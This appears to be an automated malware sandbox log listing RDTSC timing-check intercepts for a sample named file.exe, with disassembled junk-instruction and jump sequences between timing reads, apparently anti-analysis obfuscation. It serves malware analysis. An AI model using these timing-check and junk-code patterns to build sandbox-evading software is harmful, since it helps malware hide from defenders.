                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B65F second address: 136B67F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FC8515781DAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B67F second address: 136B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B688 second address: 136B68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B68C second address: 136B696 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B696 second address: 136B6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC8515781E0h 0x0000000f jmp 00007FC8515781DAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A40F second address: 136A435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FC850CE3D36h 0x0000000c popad 0x0000000d jmp 00007FC850CE3D49h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A435 second address: 136A448 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8515781DEh 0x00000008 jns 00007FC8515781D6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A448 second address: 136A450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AB01 second address: 136AB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AC44 second address: 136AC6C instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D4Eh 0x00000008 jmp 00007FC850CE3D48h 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FC850CE3D36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AF30 second address: 136AF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136AF38 second address: 136AF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B24C second address: 136B251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B251 second address: 136B260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FC850CE3D36h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136F965 second address: 136F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFD8F second address: 12EFD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376F49 second address: 1376F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781DAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376F57 second address: 1376F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13779F6 second address: 13779FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13779FC second address: 1377A22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC850CE3D3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC850CE3D3Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377B50 second address: 1377B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC8515781D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007FC8515781D6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377B67 second address: 1377B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377B6B second address: 1377B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC8515781DEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377CFA second address: 1377D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1377D02 second address: 1377D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC8515781DEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C63 second address: 1376C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C6D second address: 1376C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C73 second address: 1376C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C77 second address: 1376C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1376C7B second address: 1376C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D1FB second address: 137D201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D201 second address: 137D20B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C069 second address: 137C06F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C06F second address: 137C075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133BFE8 second address: 1323EEB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC8515781E7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FC8515781D8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ch, D7h 0x00000027 call dword ptr [ebp+122D1FEFh] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 jmp 00007FC8515781E3h 0x00000037 jmp 00007FC8515781DEh 0x0000003c je 00007FC8515781D6h 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C0CA second address: 133C0DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jns 00007FC850CE3D36h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C0DC second address: 133C0E6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8515781DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C63D second address: 133C645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C73D second address: 133C74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FC8515781DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133C985 second address: 133C989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D220 second address: 133D24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E9h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC8515781DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D24A second address: 133D24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D24E second address: 133D254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D254 second address: 133D258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D258 second address: 133D26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D26A second address: 133D274 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D274 second address: 133D279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D279 second address: 133D29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FC850CE3D3Eh 0x0000000f push edi 0x00000010 jnp 00007FC850CE3D36h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FC850CE3D36h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D29E second address: 133D2A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D339 second address: 133D33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D33E second address: 133D35D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC8515781E0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC8515781D8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D35D second address: 133D3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC850CE3D3Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c and cx, D965h 0x00000011 lea eax, dword ptr [ebp+12481D00h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FC850CE3D38h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jp 00007FC850CE3D36h 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133D3AF second address: 133D3B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8515781DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C65F second address: 137C669 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C669 second address: 137C685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C685 second address: 137C689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C689 second address: 137C694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C97B second address: 137C984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C984 second address: 137C994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8515781DBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CB21 second address: 137CB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137CC74 second address: 137CC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC8515781D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384D12 second address: 1384D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384D16 second address: 1384D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383DD2 second address: 1383DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383DD6 second address: 1383E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8515781DAh 0x00000013 jmp 00007FC8515781E5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13840FB second address: 138410B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC850CE3D3Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383863 second address: 1383867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383867 second address: 138388D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC850CE3D48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC850CE3D38h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138388D second address: 1383892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1383892 second address: 1383898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386DA1 second address: 1386DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC8515781D6h 0x0000000a jp 00007FC8515781D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386DB1 second address: 1386DCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FC850CE3D44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F2C second address: 1386F55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007FC8515781D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8515781E9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F55 second address: 1386F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F59 second address: 1386F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F72 second address: 1386F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386F7D second address: 1386F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBBE0 second address: 12FBBF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389D98 second address: 1389DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DEh 0x00000007 jmp 00007FC8515781DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC8515781DDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A093 second address: 138A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E1A7 second address: 138E1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC8515781D6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E1B5 second address: 138E1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E1C0 second address: 138E1C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DB4C second address: 138DB6F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC850CE3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC850CE3D41h 0x00000010 jp 00007FC850CE3D36h 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138DEA2 second address: 138DEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC8515781E9h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13923AA second address: 13923C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 js 00007FC850CE3D36h 0x0000000c jp 00007FC850CE3D36h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13915F4 second address: 13915F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13915F8 second address: 13915FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13915FE second address: 139160E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC8515781D6h 0x0000000a jg 00007FC8515781D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139160E second address: 1391612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139178B second address: 139178F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139178F second address: 139179D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC850CE3D38h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139179D second address: 13917B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC8515781D6h 0x0000000a jmp 00007FC8515781DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391BF9 second address: 1391BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391D2C second address: 1391D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391D31 second address: 1391D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391ECB second address: 1391EDF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8515781D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391EDF second address: 1391EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391EE7 second address: 1391EEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1397692 second address: 1397696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
